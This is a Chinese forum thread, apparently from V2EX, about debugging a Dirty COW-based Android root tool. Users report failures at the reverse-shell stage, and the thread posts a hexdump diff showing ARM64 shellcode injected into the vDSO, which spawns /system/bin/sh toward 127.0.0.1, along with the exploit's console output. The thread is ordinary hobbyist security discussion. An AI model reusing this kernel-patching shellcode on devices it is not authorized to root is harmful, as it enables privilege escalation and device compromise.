搞了一个基于 dirtycow 的 Android 的 root 工具

@tyeken8 请问你多次熄屏再唤醒了吗？

@tyeken8
首先你可以尝试一下我发现的新的触发手段：打开系统自带的闹钟 /时钟 APP
其次请检查 /data/local/tmp/.x 是否存在，有则删之（注意是个隐藏文件），保证在“ Waiting for reverse connect shell.”时那个文件是不存在的。
最后由于我现在忽略的注入后的检查，因此有可能并没有注入成功，这个就比较悲剧了，我打算加上 log ，方便大家调试。
我测试过的两台手机全是国产的，分别是乐 max2 和中兴 blade a2 。

@woyaojizhu8 这是由于漏洞没有触发或者根本没有注入成功，对于前者，我上面有一些补充，对于后者，我之后会加入日志方便调试。

@woyaojizhu8 @tyeken8 @postlive @bdbai
十分抱歉，刚刚 v0.1.1 修复了一个 bug 有可能会导致你们的问题出现。

果然不行了，看了眼内核版本是 Dec 19 的。

@hyln9 Sry, still no luck.

另外那个大括号笑死了（（

不行啊，卡到 >>> Waiting for reverse connect shell. 这里没反应
严格按照你说的步骤操作的，几种触发方式都试过了， V0.1.1 版本

@hyln9 又试了一下，休眠唤醒多次并没有成功，电视盒子上也没有自带闹钟应用 :(
总之很感谢你，请收下铜币。

@kamen 2016-11-06 安全补丁之前

@bdbai
@tyeken8
@makendk

我赶紧补足了一些 debug 功能，如果可以的话，请下载 dbg 版本，将运行之后生成的“ vdso_orig.so ”和“ vdso_patched.so ”发送至我的邮箱： hyln9$live.cn （$换成 @），谢谢！

其中不包含任何个人信息，只包含 kernel 的一部分纯代码的 dump 。

@bdbai
@tyeken8
@makendk

另外明早要坐火车，可能会无法及时回复。

@hyln9 谢谢

生成的 vdso_orig.so ， vdso_patched.so 在哪
/data/local/tmp/目录下看不到 DBG 版本的

@makendk github 上我在 v0.1.1 里面加了一个 dbg 版本。

就是 dbg 版的 看不到.so 文件

@hyln9
$ diff <(hexdump -C vdso_orig.so) <(hexdump -C vdso_patched.so)

52c52
< 00000330 1f 00 00 71 04 18 41 7a 81 02 00 54 e2 03 1e aa |...q..Az...T....|
---
> 00000330 f0 03 1e aa ea 02 00 94 81 02 00 54 e2 03 1e aa |...........T....|
171a172,190
> 00000ed0 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 bf a9 |................|
> 00000ee0 c8 15 80 d2 01 00 00 d4 a0 06 00 35 88 15 80 d2 |...........5....|
> 00000ef0 01 00 00 d4 1f 04 00 71 21 06 00 54 00 00 80 52 |.......q!..T...R|
> 00000f00 a1 06 00 10 02 18 80 52 03 38 80 52 08 07 80 d2 |.......R.8.R....|
> 00000f10 01 00 00 d4 1f 04 40 b1 28 05 00 54 20 02 80 d2 |......@.(..T ...|
> 00000f20 01 00 80 d2 02 00 80 d2 03 00 80 d2 04 00 80 d2 |................|
> 00000f30 88 1b 80 d2 01 00 00 d4 20 04 00 35 40 00 80 d2 |........ ..5@...|
> 00000f40 21 00 80 d2 02 00 80 d2 c8 18 80 d2 01 00 00 d4 |!...............|
> 00000f50 e3 03 00 aa a1 04 00 10 02 02 80 d2 68 19 80 d2 |............h...|
> 00000f60 01 00 00 d4 60 02 00 35 e0 03 03 aa 02 00 80 d2 |....`..5........|
> 00000f70 01 00 80 d2 08 03 80 d2 01 00 00 d4 21 00 80 d2 |............!...|
> 00000f80 08 03 80 d2 01 00 00 d4 41 00 80 d2 08 03 80 d2 |........A.......|
> 00000f90 01 00 00 d4 e0 02 00 10 02 00 80 d2 e0 03 00 f9 |................|
> 00000fa0 e2 07 00 f9 e1 03 00 91 a8 1b 80 d2 01 00 00 d4 |................|
> 00000fb0 00 00 80 d2 a8 0b 80 d2 01 00 00 d4 e0 07 c1 a8 |................|
> 00000fc0 f1 03 1e aa fe 03 10 aa 1f 00 00 71 04 18 41 7a |...........q..Az|
> 00000fd0 20 02 1f d6 2f 64 61 74 61 2f 6c 6f 63 61 6c 2f | .../data/local/|
> 00000fe0 74 6d 70 2f 2e 78 00 00 02 00 04 d2 7f 00 00 01 |tmp/.x..........|
> 00000ff0 2f 73 79 73 74 65 6d 2f 62 69 6e 2f 73 68 00 00 |/system/bin/sh..|

（完整 dump 已发到邮箱）

@hyln9 抱歉回复晚了。邮件已发，请查收。

dump 发到邮箱了

很厉害啊，我也是做 android 安全的，一起交流下。

Huawei VNS-DL00
Android 6.0
Linux localhost 3.10.90-g6a1c5f3 #1 SMP PREEMPT Tue Sep 13 07:02:46 CST 2016 aarch64

shell@HWVNS-H:/data/local/tmp/exploit 12345

>>> Reverse shell target: 127.0.0.1:12345

>>> Exploit process starts.

>>> Inject: patch 1/2

>>> Inject: patch 2/2

>>> Please wake up you phone now.

>>> Waiting for reverse connect shell.